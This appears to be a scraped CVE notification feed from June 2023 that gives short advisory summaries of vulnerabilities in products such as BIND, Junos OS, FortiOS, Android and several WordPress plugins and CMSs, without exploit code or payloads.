🚨 CVE-2015-10118A vulnerability classified as problematic was found in cchetanonline WP-CopyProtect up to 3.0.0. This vulnerability affects the function CopyProtect_options_page of the file wp-copyprotect.php. The manipulation of the argument CopyProtect_nrc_text leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 3.1.0 is able to address this issue. The patch is identified as 8b8fe4102886b326330dc1ff06b17313fb10aee5. It is recommended to upgrade the affected component. VDB-231202 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-21 18:58:31 |
🚨 CVE-2023-0026An Improper Input Validation vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). When a BGP update message is received over an established BGP session, and that message contains a specific, optional transitive attribute, this session will be torn down with an update message error. This issue cannot propagate beyond an affected system as the processing error occurs as soon as the update is received. This issue is exploitable remotely as the respective attribute can propagate through unaffected systems and intermediate AS (if any). Continuous receipt of a BGP update containing this attribute will create a sustained Denial of Service (DoS) condition. Some customers have experienced these BGP session flaps which prompted Juniper SIRT to release this advisory out of cycle before fixed releases are widely available as there is an effective workaround. This issue affects: Juniper Networks Junos OS 15.1R1 and later versions prior to 20.4R3-S8; 21.1 version 21.1R1 and later versions prior to 21.2R3-S6; 21.3 versions prior to 21.3R3-S5; 21.4 versions prior to 21.4R3-S4; 22.1 versions prior to 22.1R3-S4; 22.2 versions prior to 22.2R3-S2; 22.3 versions prior to 22.2R3-S2; 22.4 versions prior to 22.4R2-S1, 22.4R3; 23.1 versions prior to 23.1R1-S1, 23.1R2. Juniper Networks Junos OS Evolved All versions prior to 20.4R3-S8-EVO; 21.1 version 21.1R1-EVO and later versions prior to 21.2R3-S6-EVO; 21.3 versions prior to 21.3R3-S5-EVO; 21.4 versions prior to 21.4R3-S4-EVO; 22.1 versions prior to 22.1R3-S4-EVO; 22.2 versions prior to 22.2R3-S2-EVO; 22.3 versions prior to 22.3R2-S2-EVO, 22.3R3-S1-EVO; 22.4 versions prior to 22.4R2-S1-EVO, 22.4R3-EVO; 23.1 versions prior to 23.1R1-S1-EVO, 23.1R2-EVO.🎖@cveNotify |
|
| 2023-06-21 18:58:30 |
🚨 CVE-2023-2828Every `named` instance configured to run as a recursive resolver maintains a cache database holding the responses to the queries it has recently sent to authoritative servers. The size limit for that cache database can be configured using the `max-cache-size` statement in the configuration file; it defaults to 90% of the total amount of memory available on the host. When the size of the cache reaches 7/8 of the configured limit, a cache-cleaning algorithm starts to remove expired and/or least-recently used RRsets from the cache, to keep memory use below the configured limit.It has been discovered that the effectiveness of the cache-cleaning algorithm used in `named` can be severely diminished by querying the resolver for specific RRsets in a certain order, effectively allowing the configured `max-cache-size` limit to be significantly exceeded.This issue affects BIND 9 versions 9.11.0 through 9.16.41, 9.18.0 through 9.18.15, 9.19.0 through 9.19.13, 9.11.3-S1 through 9.16.41-S1, and 9.18.11-S1 through 9.18.15-S1.🎖@cveNotify |
|
| 2023-06-21 18:58:29 |
🚨 CVE-2023-2829A `named` instance configured to run as a DNSSEC-validating recursive resolver with the Aggressive Use of DNSSEC-Validated Cache (RFC 8198) option (`synth-from-dnssec`) enabled can be remotely terminated using a zone with a malformed NSEC record.This issue affects BIND 9 versions 9.16.8-S1 through 9.16.41-S1 and 9.18.11-S1 through 9.18.15-S1.🎖@cveNotify |
|
| 2023-06-21 18:58:28 |
🚨 CVE-2023-2911If the `recursive-clients` quota is reached on a BIND 9 resolver configured with both `stale-answer-enable yes;` and `stale-answer-client-timeout 0;`, a sequence of serve-stale-related lookups could cause `named` to loop and terminate unexpectedly due to a stack overflow.This issue affects BIND 9 versions 9.16.33 through 9.16.41, 9.18.7 through 9.18.15, 9.16.33-S1 through 9.16.41-S1, and 9.18.11-S1 through 9.18.15-S1.🎖@cveNotify |
|
| 2023-06-21 18:58:27 |
🚨 CVE-2023-32673Certain versions of HP PC Hardware Diagnostics Windows, HP Image Assistant, and HP Thunderbolt Dock G2 Firmware are potentially vulnerable to elevation of privilege.🎖@cveNotify |
|
| 2023-06-21 18:58:25 |
🚨 CVE-2023-32674Certain versions of HP PC Hardware Diagnostics Windows are potentially vulnerable to buffer overflow.🎖@cveNotify |
|
| 2023-06-21 18:58:24 |
🚨 CVE-2023-32021Windows SMB Witness Service Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-06-21 18:58:23 |
🚨 CVE-2023-2729Use of insufficiently random values vulnerability in User Management Functionality in Synology DiskStation Manager (DSM) before 7.2-64561 allows remote attackers to obtain user credential via unspecified vectors.🎖@cveNotify |
|
| 2023-06-21 18:58:18 |
🚨 CVE-2023-27243An access control issue in Makves DCAP v3.0.0.122 allows unauthenticated attackers to obtain cleartext credentials via a crafted web request to the product API.🎖@cveNotify |
|
| 2023-06-21 18:58:17 |
🚨 CVE-2023-33725Broadleaf 5.x and 6.x (including 5.2.25-GA and 6.2.6-GA) was discovered to contain a cross-site scripting (XSS) vulnerability via a customer signup with a crafted email address. This is fixed in 6.2.6.1-GA.🎖@cveNotify |
|
| 2023-06-21 18:58:16 |
🚨 CVE-2022-27140** DISPUTED ** An arbitrary file upload vulnerability in the file upload module of express-fileupload 1.3.1 allows attackers to execute arbitrary code via a crafted PHP file. NOTE: the vendor's position is that the observed behavior can only occur with "intentional misusing of the API": the express-fileupload middleware is not responsible for an application's business logic (e.g., determining whether or how a file should be renamed).🎖@cveNotify |
|
| 2023-06-21 18:58:15 |
🚨 CVE-2023-33290The git-url-parse crate through 0.4.4 for Rust allows Regular Expression Denial of Service (ReDos) via a crafted URL to normalize_url in lib.rs, a similar issue to CVE-2023-32758 (Python).🎖@cveNotify |
|
| 2023-06-21 17:58:20 |
🚨 CVE-2023-21514Improper scheme validation from InstantPlay Deeplink in Galaxy Store prior to version 4.5.49.8 allows attackers to execute javascript API to install APK from Galaxy Store.🎖@cveNotify |
|
| 2023-06-21 15:58:26 |
🚨 CVE-2023-33584Sourcecodester Enrollment System Project V1.0 is vulnerable to SQL Injection (SQLI) attacks, which allow an attacker to manipulate the SQL queries executed by the application. The application fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code.🎖@cveNotify |
|
| 2023-06-21 15:58:24 |
🚨 CVE-2023-35866** DISPUTED ** In KeePassXC through 2.7.5, a local attacker can make changes to the Database security settings, including master password and second-factor authentication, within an authenticated KeePassXC Database session, without the need to authenticate these changes by entering the password and/or second-factor authentication to confirm changes. NOTE: the vendor's position is "asking the user for their password prior to making any changes to the database settings adds no additional protection against a local attacker."🎖@cveNotify |
|
| 2023-06-21 15:58:21 |
🚨 CVE-2022-48282Under very specific circumstances (see Required configuration section below), a privileged user is able to cause arbitrary code to be executed which may cause further disruption to services. This is specific to applications written in C#. This affects all MongoDB .NET/C# Driver versions prior to and including v2.18.0Following configuration must be true for the vulnerability to be applicable: * Application must written in C# taking arbitrary data from users and serializing data using _t without any validation AND * Application must be running on a Windows host using the full .NET Framework, not .NET Core AND * Application must have domain model class with a property/field explicitly of type System.Object or a collection of type System.Object (against MongoDB best practice) AND * Malicious attacker must have unrestricted insert access to target database to add a _t discriminator."Following configuration must be true for the vulnerability to be applicable🎖@cveNotify |
|
| 2023-06-21 15:58:20 |
🚨 CVE-2023-21136In multiple functions of JobStore.java, there is a possible way to cause a crash on startup due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-246542285🎖@cveNotify |
|
| 2023-06-21 15:58:19 |
🚨 CVE-2023-21122In various functions of various files, there is a possible way to bypass the DISALLOW_DEBUGGING_FEATURES restriction for tracing due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-270050191🎖@cveNotify |
|
| 2023-06-21 15:58:18 |
🚨 CVE-2023-21123In multiple functions of multiple files, there is a possible way to bypass the DISALLOW_DEBUGGING_FEATURES restriction for tracing due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-270050064🎖@cveNotify |
|
| 2023-06-21 15:58:14 |
🚨 CVE-2023-21101In multiple functions of WVDrmPlugin.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-258189255🎖@cveNotify |
|
| 2023-06-21 15:58:13 |
🚨 CVE-2023-21105In multiple functions of ChooserActivity.java, there is a possible cross-user media read due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-261036568🎖@cveNotify |
|
| 2023-06-21 15:58:12 |
🚨 CVE-2023-34363An issue was discovered in Progress DataDirect Connect for ODBC before 08.02.2770 for Oracle. When using Oracle Advanced Security (OAS) encryption, if an error is encountered initializing the encryption object used to encrypt data, the code falls back to a different encryption mechanism that uses an insecure random number generator to generate the private key. It is possible for a well-placed attacker to predict the output of this random number generator, which could lead to an attacker decrypting traffic between the driver and the database server. The vulnerability does not exist if SSL / TLS encryption is used.🎖@cveNotify |
|
| 2023-06-21 12:58:39 |
🚨 CVE-2023-34981A regression in the fix for bug 66512 in Apache Tomcat 11.0.0-M5, 10.1.8, 9.0.74 and 8.5.88 meant that, if a response did not include any HTTP headers no AJP SEND_HEADERS messare woudl be sent for the response which in turn meant that at least one AJP proxy (mod_proxy_ajp) would use the response headers from the previous request leading to an information leak.🎖@cveNotify |
|
| 2023-06-21 10:58:45 |
🚨 CVE-2023-34340Improper Authentication vulnerability in Apache Software Foundation Apache Accumulo.This issue affects Apache Accumulo: 2.1.0.Accumulo 2.1.0 contains a defect in the user authentication process that may succeed when invalid credentials are provided. Users are advised to upgrade to 2.1.1.🎖@cveNotify |
|
| 2023-06-21 10:58:43 |
🚨 CVE-2023-3339A vulnerability has been found in code-projects Agro-School Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file exam-delete.php. The manipulation of the argument test_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-232015.🎖@cveNotify |
|
| 2023-06-21 10:58:42 |
🚨 CVE-2022-25883Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.🎖@cveNotify |
|
| 2023-06-21 10:58:41 |
🚨 CVE-2023-0457Plaintext Storage of a Password vulnerability in Mitsubishi Electric Corporation MELSEC iQ-F Series, MELSEC iQ-R Series, MELSEC-Q Series and MELSEC-L Series allows a remote unauthenticated attacker to disclose plaintext credentials stored in project files and login into FTP server or Web server.🎖@cveNotify |
|
| 2023-06-21 06:59:03 |
🚨 CVE-2023-2977A vulnerbility was found in OpenSC. This security flaw cause a buffer overrun vulnerability in pkcs15 cardos_have_verifyrc_package. The attacker can supply a smart card package with malformed ASN1 context. The cardos_have_verifyrc_package function scans the ASN1 buffer for 2 tags, where remaining length is wrongly caculated due to moved starting pointer. This leads to possible heap-based buffer oob read. In cases where ASAN is enabled while compiling this causes a crash. Further info leak or more damage is possible.🎖@cveNotify |
|
| 2023-06-21 06:59:02 |
🚨 CVE-2021-42779A heap use after free issue was found in Opensc before version 0.22.0 in sc_file_valid.🎖@cveNotify |
|
| 2023-06-21 06:59:01 |
🚨 CVE-2021-42780A use after return issue was found in Opensc before version 0.22.0 in insert_pin function that could potentially crash programs using the library.🎖@cveNotify |
|
| 2023-06-21 06:59:00 |
🚨 CVE-2021-42781Heap buffer overflow issues were found in Opensc before version 0.22.0 in pkcs15-oberthur.c that could potentially crash programs using the library.🎖@cveNotify |
|
| 2023-06-21 06:58:59 |
🚨 CVE-2021-42782Stack buffer overflow issues were found in Opensc before version 0.22.0 in various places that could potentially crash programs using the library.🎖@cveNotify |
|
| 2023-06-21 06:58:55 |
🚨 CVE-2019-6502sc_context_create in ctx.c in libopensc in OpenSC 0.19.0 has a memory leak, as demonstrated by a call from eidenv.🎖@cveNotify |
|
| 2023-06-21 06:58:54 |
🚨 CVE-2023-34855A Cross Site Scripting (XSS) vulnerability in Youxun Electronic Equipment (Shanghai) Co., Ltd AC Centralized Management Platform v1.02.040 allows attackers to execute arbitrary code via uploading a crafted HTML file to the interface /upfile.cgi.🎖@cveNotify |
|
| 2023-06-21 06:58:53 |
🚨 CVE-2023-0342MongoDB Ops Manager Diagnostics Archive may not redact sensitive PEM key file password app settings. Archives do not include the PEM files themselves. This issue affects MongoDB Ops Manager v5.0 prior to 5.0.21 and MongoDB Ops Manager v6.0 prior to 6.0.12🎖@cveNotify |
|
| 2023-06-21 06:58:52 |
🚨 CVE-2023-34364A buffer overflow was discovered in Progress DataDirect Connect for ODBC before 08.02.2770 for Oracle. An overly large value for certain options of a connection string may overrun the buffer allocated to process the string value. This allows an attacker to execute code of their choice on an affected host by copying carefully selected data that will be executed as code.🎖@cveNotify |
|
| 2023-06-21 06:58:51 |
🚨 CVE-2023-34239Gradio is an open-source Python library that is used to build machine learning and data science. Due to a lack of path filtering Gradio does not properly restrict file access to users. Additionally Gradio does not properly restrict the what URLs are proxied. These issues have been addressed in version 3.34.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-06-21 06:58:47 |
🚨 CVE-2022-32757IBM Security Directory Suite VA 8.0.1 through 8.0.1.19 uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 228510.🎖@cveNotify |
|
| 2023-06-21 06:58:46 |
🚨 CVE-2022-33166IBM Security Directory Suite VA 8.0.1 through 8.0.1.19 could allow a privileged user to upload malicious files of dangerous types that can be automatically processed within the product's environment. IBM X-Force ID: 228586.🎖@cveNotify |
|
| 2023-06-21 06:58:45 |
🚨 CVE-2022-33163IBM Security Directory Suite VA 8.0.1 specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors. IBM X-Force ID: 228571.🎖@cveNotify |
|
| 2023-06-21 06:58:41 |
🚨 CVE-2022-33168IBM Security Directory Suite VA 8.0.1 could allow an attacker to cause a denial of service due to uncontrolled resource consumption. IBM X-Force ID: 228588.🎖@cveNotify |
|
| 2023-06-21 06:58:40 |
🚨 CVE-2023-25683IBM PowerVM Hypervisor FW950.00 through FW950.71, FW1010.00 through FW1010.40, FW1020.00 through FW1020.20, and FW1030.00 through FW1030.11 could allow an attacker to obtain sensitive information if they gain service access to the HMC. IBM X-Force ID: 247592.🎖@cveNotify |
|
| 2023-06-21 06:58:39 |
🚨 CVE-2020-12762json-c through 0.14 has an integer overflow and out-of-bounds write via a large JSON file, as demonstrated by printbuf_memappend.🎖@cveNotify |
|
| 2023-06-21 06:58:38 |
🚨 CVE-2022-22307IBM Security Guardium 11.3, 11.4, and 11.5 could allow a local user to obtain elevated privileges due to incorrect authorization checks. IBM X-Force ID: 216753.🎖@cveNotify |
|
| 2023-06-20 22:58:35 |
🚨 CVE-2023-29353Sysinternals Process Monitor for Windows Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-06-20 22:58:34 |
🚨 CVE-2023-3198The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_status_order_message function. This makes it possible for unauthenticated attackers to update status order message via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-20 22:58:33 |
🚨 CVE-2023-3201The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_new_order_title function. This makes it possible for unauthenticated attackers to update new order title via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-20 22:58:29 |
🚨 CVE-2023-3203The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_limit_product function. This makes it possible for unauthenticated attackers to update limit the number of product per category to use cache data in home screen via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-20 22:58:28 |
🚨 CVE-2023-29358Windows GDI Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-20 22:58:27 |
🚨 CVE-2023-29370Windows Media Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-20 22:58:23 |
🚨 CVE-2023-29371Windows GDI Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-20 22:58:22 |
🚨 CVE-2023-29373Microsoft ODBC Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-20 22:58:21 |
🚨 CVE-2023-32009Windows Collaborative Translation Framework Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-20 22:58:18 |
🚨 CVE-2023-32010Windows Bus Filter Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-20 22:58:17 |
🚨 CVE-2023-32019Windows Kernel Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-06-20 22:58:16 |
🚨 CVE-2023-33869Enphase Envoy versions D7.0.88 is vulnerable to a command injection exploit that may allow an attacker to execute root commands.🎖@cveNotify |
|
| 2023-06-20 21:58:25 |
🚨 CVE-2023-29178A access of uninitialized pointer vulnerability [CWE-824] in Fortinet FortiProxy version 7.2.0 through 7.2.3 and before 7.0.9 and FortiOS version 7.2.0 through 7.2.4 and before 7.0.11 allows an authenticated attacker to repetitively crash the httpsd process via crafted HTTP or HTTPS requests.🎖@cveNotify |
|
| 2023-06-20 21:58:24 |
🚨 CVE-2023-33984SAP NetWeaver (Design Time Repository) - version 7.50, returns an unfavorable content type for some versioned files, which could allow an authorized attacker to create a file with a malicious content and send a link to a victim in an email or instant message. Under certain circumstances, this could lead to Cross-Site Scripting vulnerability.🎖@cveNotify |
|
| 2023-06-20 21:58:23 |
🚨 CVE-2023-27997A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests.🎖@cveNotify |
|
| 2023-06-20 21:58:22 |
🚨 CVE-2023-33985SAP NetWeaver Enterprise Portal - version 7.50, does not sufficiently encode user-controlled inputs over the network, resulting in reflected Cross-Site Scripting (XSS) vulnerability, therefore changing the scope of the attack. On successful exploitation, an attacker can view or modify information causing a limited impact on confidentiality and integrity of the application.🎖@cveNotify |
|
| 2023-06-20 21:58:21 |
🚨 CVE-2023-2563The WordPress Contact Forms by Cimatti plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5.7. This is due to missing or incorrect nonce validation on the function _accua_forms_form_edit_action. This makes it possible for unauthenticated attackers to delete forms created with this plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-20 21:58:20 |
🚨 CVE-2023-35033Atos Unify OpenScape 4000 Assistant V10 R1 before V10 R1.42.0 and V10 R1.34.8, Assistant V10 R0, Manager V10 R1 before V10 R1.42.0 and V10 R1.34.8, and Manager V10 R0 allow command injection by authenticated users, aka OSFOURK-23556.🎖@cveNotify |
|
| 2023-06-20 21:58:19 |
🚨 CVE-2023-35031Atos Unify OpenScape 4000 Assistant V10 R1 before V10 R1.42.0 and V10 R1.34.8, Assistant V10 R0, Manager V10 R1 before V10 R1.42.0 and V10 R1.34.8, and Manager V10 R0 allow command injection by authenticated users, aka OSFOURK-24036.🎖@cveNotify |
|
| 2023-06-20 21:58:18 |
🚨 CVE-2023-35035Atos Unify OpenScape 4000 Assistant V10 R1 before V10 R1.42.0 and V10 R1.34.8, Assistant V10 R0, Manager V10 R1 before V10 R1.42.0 and V10 R1.34.8, and Manager V10 R0 allow command injection by authenticated users, aka OSFOURK-23557.🎖@cveNotify |
|
| 2023-06-20 21:58:17 |
🚨 CVE-2023-35032Atos Unify OpenScape 4000 Assistant V10 R1 before V10 R1.42.0 and V10 R1.34.8 and Manager V10 R1 before V10 R1.42.0 and V10 R1.34.8 allow command injection by authenticated users, aka OSFOURK-23554.🎖@cveNotify |
|
| 2023-06-20 21:58:15 |
🚨 CVE-2022-31693VMware Tools for Windows (12.x.y prior to 12.1.5, 11.x.y and 10.x.y) contains a denial-of-service vulnerability in the VM3DMP driver. A malicious actor with local user privileges in the Windows guest OS, where VMware Tools is installed, can trigger a PANIC in the VM3DMP driver leading to a denial-of-service condition in the Windows guest OS.🎖@cveNotify |
|
| 2023-06-20 21:58:14 |
🚨 CVE-2007-3945Rule Set Based Access Control (RSBAC) before 1.3.5 does not properly use the Linux Kernel Crypto API for the Linux kernel 2.6.x, which allows context-dependent attackers to bypass authentication controls via unspecified vectors, possibly involving User Management password hashing and unchecked function return codes.🎖@cveNotify |
|
| 2023-06-20 21:58:13 |
🚨 CVE-2023-32312UmbracoIdentityExtensions is an Umbraco add-on package that enables easy extensibility points for ASP.Net Identity integration. In affected versions client secrets are not required which may expose some endpoints to untrusted actors. Since Umbraco is not a single-page application, the implicit flow is not safe. For traditional MVC applications, it is recommended to use the authorization code flow, which requires the client to authenticate with the authorization server using a client secret. This flow provides better security, as it involves exchanging an authorization code for an access token and/or ID token, rather than directly returning tokens in the URL fragment. This issue has been patched in commit `e792429f9` and a release to Nuget is pending. Users are advised to upgrade when possible.🎖@cveNotify |
|
| 2023-06-20 19:58:38 |
🚨 CVE-2023-34969D-Bus before 1.15.6 sometimes allows unprivileged users to crash dbus-daemon. If a privileged user with control over the dbus-daemon is using the org.freedesktop.DBus.Monitoring interface to monitor message bus traffic, then an unprivileged user with the ability to connect to the same dbus-daemon can cause a dbus-daemon crash under some circumstances via an unreplyable message. When done on the well-known system bus, this is a denial-of-service vulnerability. The fixed versions are 1.12.28, 1.14.8, and 1.15.6.🎖@cveNotify |
|
| 2023-06-20 19:58:37 |
🚨 CVE-2023-31124c-ares is an asynchronous resolver library. When cross-compiling c-ares and using the autotools build system, CARES_RANDOM_FILE will not be set, as seen when cross compiling aarch64 android. This will downgrade to using rand() as a fallback which could allow an attacker to take advantage of the lack of entropy by not using a CSPRNG. This issue was patched in version 1.19.1.🎖@cveNotify |
|
| 2023-06-20 19:58:36 |
🚨 CVE-2023-2878Kubernetes secrets-store-csi-driver in versions before 1.3.3 discloses service account tokens in logs.🎖@cveNotify |
|
| 2023-06-20 19:58:35 |
🚨 CVE-2023-34944An arbitrary file upload vulnerability in the /fileUpload.lib.php component of Chamilo 1.11.* up to v1.11.18 allows attackers to execute arbitrary code via uploading a crafted SVG file.🎖@cveNotify |
|
| 2023-06-20 19:58:34 |
🚨 CVE-2021-32837mechanize, a library for automatically interacting with HTTP web servers, contains a regular expression that is vulnerable to regular expression denial of service (ReDoS) prior to version 0.4.6. If a web server responds in a malicious way, then mechanize could crash. Version 0.4.6 has a patch for the issue.🎖@cveNotify |
|
| 2023-06-20 19:58:30 |
🚨 CVE-2019-10952An attacker could send a crafted HTTP/HTTPS request to render the web server unavailable and/or lead to remote code execution caused by a stack-based buffer overflow vulnerability. A cold restart is required for recovering CompactLogix 5370 L1, L2, and L3 Controllers, Compact GuardLogix 5370 controllers, and Armor Compact GuardLogix 5370 Controllers Versions 20 - 30 and earlier.🎖@cveNotify |
|
| 2023-06-20 19:58:29 |
🚨 CVE-2023-34537A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data.🎖@cveNotify |
|
| 2023-06-20 19:58:28 |
🚨 CVE-2023-3224Code Injection in GitHub repository nuxt/nuxt prior to 3.5.3.🎖@cveNotify |
|
| 2023-06-20 19:58:27 |
🚨 CVE-2023-29175An improper certificate validation vulnerability [CWE-295] in FortiOS 6.2 all versions, 6.4 all versions, 7.0.0 through 7.0.10, 7.2.0 and FortiProxy 1.2 all versions, 2.0 all versions, 7.0.0 through 7.0.9, 7.2.0 through 7.2.3 may allow a remote and unauthenticated attacker to perform a Man-in-the-Middle attack on the communication channel between the vulnerable device and the remote FortiGuard's map server.🎖@cveNotify |
|
| 2023-06-20 19:58:23 |
🚨 CVE-2023-34335AMI BMC contains a vulnerability in the IPMI handler, where anunauthenticated host is allowed to write to a host SPI flash, bypassing secureboot protections. An exploitation of this vulnerability may lead to a loss ofintegrity or denial of service. 🎖@cveNotify |
|
| 2023-06-20 19:58:22 |
🚨 CVE-2023-34342AMI BMC contains a vulnerability in the IPMI handler, where anattacker can upload and download arbitrary files under certain circumstances,which may lead to denial of service, escalation of privileges, informationdisclosure, or data tampering.🎖@cveNotify |
|
| 2023-06-20 19:58:21 |
🚨 CVE-2023-34334AMI BMC contains a vulnerability in the SPX REST API, where anattacker with the required privileges can inject arbitrary shell commands,which may lead to code execution, denial of service, information disclosure, ordata tampering. 🎖@cveNotify |
|
| 2023-06-20 19:58:20 |
🚨 CVE-2023-23956A user can supply malicious HTML and JavaScript code that will be executed in the client browser🎖@cveNotify |
|
| 2023-06-20 19:58:16 |
🚨 CVE-2023-0451Econolite EOS versions prior to 3.2.23 lack a passwordrequirement for gaining “READONLY” access to log files and certain database andconfiguration files. One such file contains tables with MD5 hashes andusernames for all defined users in the control software, includingadministrators and technicians.🎖@cveNotify |
|
| 2023-06-20 19:58:15 |
🚨 CVE-2023-0452Econolite EOS versions prior to 3.2.23 use a weak hashalgorithm for encrypting privileged user credentials. A configuration file thatis accessible without authentication uses MD5 hashes for encryptingcredentials, including those of administrators and technicians.🎖@cveNotify |
|
| 2023-06-20 19:58:14 |
🚨 CVE-2023-34230snowflake-connector-net, the Snowflake Connector for .NET, is vulnerable to command injection prior to version 2.0.18 via SSO URL authentication. In order to exploit the potential for command injection, an attacker would need to be successful in (1) establishing a malicious resource and (2) redirecting users to utilize the resource. The attacker could set up a malicious, publicly accessible server which responds to the SSO URL with an attack payload. If the attacker then tricked a user into visiting the maliciously crafted connection URL, the user’s local machine would render the malicious payload, leading to a remote code execution. This attack scenario can be mitigated through URL whitelisting as well as common anti-phishing resources. Version 2.0.18 fixes this issue.🎖@cveNotify |
|
| 2023-06-20 19:58:13 |
🚨 CVE-2023-34231gosnowflake is th Snowflake Golang driver. Prior to version 1.6.19, a command injection vulnerability exists in the Snowflake Golang driver via single sign-on (SSO) browser URL authentication. In order to exploit the potential for command injection, an attacker would need to be successful in (1) establishing a malicious resource and (2) redirecting users to utilize the resource. The attacker could set up a malicious, publicly accessible server which responds to the SSO URL with an attack payload. If the attacker then tricked a user into visiting the maliciously crafted connection URL, the user’s local machine would render the malicious payload, leading to a remote code execution. This attack scenario can be mitigated through URL whitelisting as well as common anti-phishing resources. A patch is available in version 1.6.19.🎖@cveNotify |
|
| 2023-06-20 16:58:38 |
🚨 CVE-2020-20718File Upload vulnerability in PluckCMS v.4.7.10 dev versions allows a remote attacker to execute arbitrary code via a crafted image file to the the save_file() parameter.🎖@cveNotify |
|
| 2023-06-20 16:58:37 |
🚨 CVE-2020-20725Cross Site Scripting vulnerability in taogogo taoCMS v.2.5 beta5.1 allows remote attacker to execute arbitrary code via the name field in admin.php.🎖@cveNotify |
|
| 2023-06-20 16:58:36 |
🚨 CVE-2020-20726Cross Site Request Forgery vulnerability in Gila GilaCMS v.1.11.4 allows a remote attacker to execute arbitrary code via the cm/update_rows/user parameter.🎖@cveNotify |
|
| 2023-06-20 16:58:35 |
🚨 CVE-2020-20735File Upload vulnerability in LJCMS v.4.3.R60321 allows a remote attacker to execute arbitrary code via the ljcms/index.php parameter.🎖@cveNotify |
|
| 2023-06-20 16:58:34 |
🚨 CVE-2020-20918An issue discovered in Pluck CMS v.4.7.10-dev2 allows a remote attacker to execute arbitrary php code via the hidden parameter to admin.php when editing a page.🎖@cveNotify |
|
| 2023-06-20 16:58:30 |
🚨 CVE-2020-20919File upload vulnerability in Pluck CMS v.4.7.10-dev2 allows a remote attacker to execute arbitrary code and access sensitive information via the theme.php file.🎖@cveNotify |
|
| 2023-06-20 16:58:29 |
🚨 CVE-2020-20969File Upload vulnerability in PluckCMS v.4.7.10 allows a remote attacker to execute arbitrary code via the trashcan_restoreitem.php file.🎖@cveNotify |
|
| 2023-06-20 16:58:28 |
🚨 CVE-2020-21052Cross Site Scripting vulnerability in zrlog zrlog v.2.1.3 allows a remote attacker to execute arbitrary code via the nickame parameter of the /post/addComment function.🎖@cveNotify |
|
| 2023-06-20 16:58:27 |
🚨 CVE-2020-21058Cross Site Scripting vulnerability in Typora v.0.9.79 allows a remote attacker to execute arbitrary code via the mermaid sytax.🎖@cveNotify |
|
| 2023-06-20 16:58:26 |
🚨 CVE-2020-21174File Upload vulenrability in liufee CMS v.2.0.7.1 allows a remote attacker to execute arbitrary code via the image suffix function.🎖@cveNotify |
|
| 2023-06-20 16:58:22 |
🚨 CVE-2020-21246Cross Site Scripting vulnerability in YiiCMS v.1.0 allows a remote attacker to execute arbitrary code via the news function.🎖@cveNotify |
|
| 2023-06-20 16:58:21 |
🚨 CVE-2020-21252Cross Site Request Forgery vulnerability in Neeke HongCMS 3.0.0 allows a remote attacker to execute arbitrary code and escalate privileges via the updateusers parameter.🎖@cveNotify |
|
| 2023-06-20 16:58:20 |
🚨 CVE-2020-21268Cross Site Scripting vulnerability in EasySoft ZenTao v.11.6.4 allows a remote attacker to execute arbitrary code via the lastComment parameter.🎖@cveNotify |
|
| 2023-06-20 16:58:19 |
🚨 CVE-2020-21366Cross Site Request Forgery vulnerability in GreenCMS v.2.3 allows an attacker to gain privileges via the adduser function of index.php.🎖@cveNotify |
|
| 2023-06-20 16:58:15 |
